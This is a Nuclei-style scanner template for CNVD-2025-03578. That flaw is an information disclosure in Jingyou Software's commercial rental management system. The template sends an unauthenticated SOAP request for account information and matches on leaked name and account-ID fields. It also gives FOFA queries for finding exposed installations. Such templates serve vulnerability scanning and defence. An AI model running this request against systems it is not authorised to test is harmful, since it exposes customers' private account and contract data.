http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"Name":"'
            - '"Accountid":'
            - '"Iscompany":"'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "POST /rental/contract/api/account.asmx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/GetAccountInfo\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap:Envelope \n    xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n    xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" \n    xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soap:Body>\n        <GetAccountInfo xmlns=\"http://tempuri.org/\" />\n    </soap:Body>\n</soap:Envelope>  \n"
id: jingyou-shangyezulin-Information-disclosure-CNVD-2025-03578
info:
    author: Superhero
    description: |-
        fofa: title="商业租赁管理系统" || body="Silverlight/install/Silverlight5.exe" || body="pageUrl = \"/loading.aspx\"" || body="竞优软件</a>"
        竞优软件 商业租赁管理系统存在严重的信息泄露漏洞，攻击者可利用该漏洞非法获取用户敏感信息，如租赁合同、客户数据等，可能导致重大经济损失和隐私泄露风险。
    name: 竞优软件 商业租赁管理系统 信息泄露漏洞(CNVD-2025-03578)
    reference:
        - https://mp.weixin.qq.com/s/dcBZcg8XkeZoCwoffE1vAA
    severity: medium
    tags:
        - Information disclosure
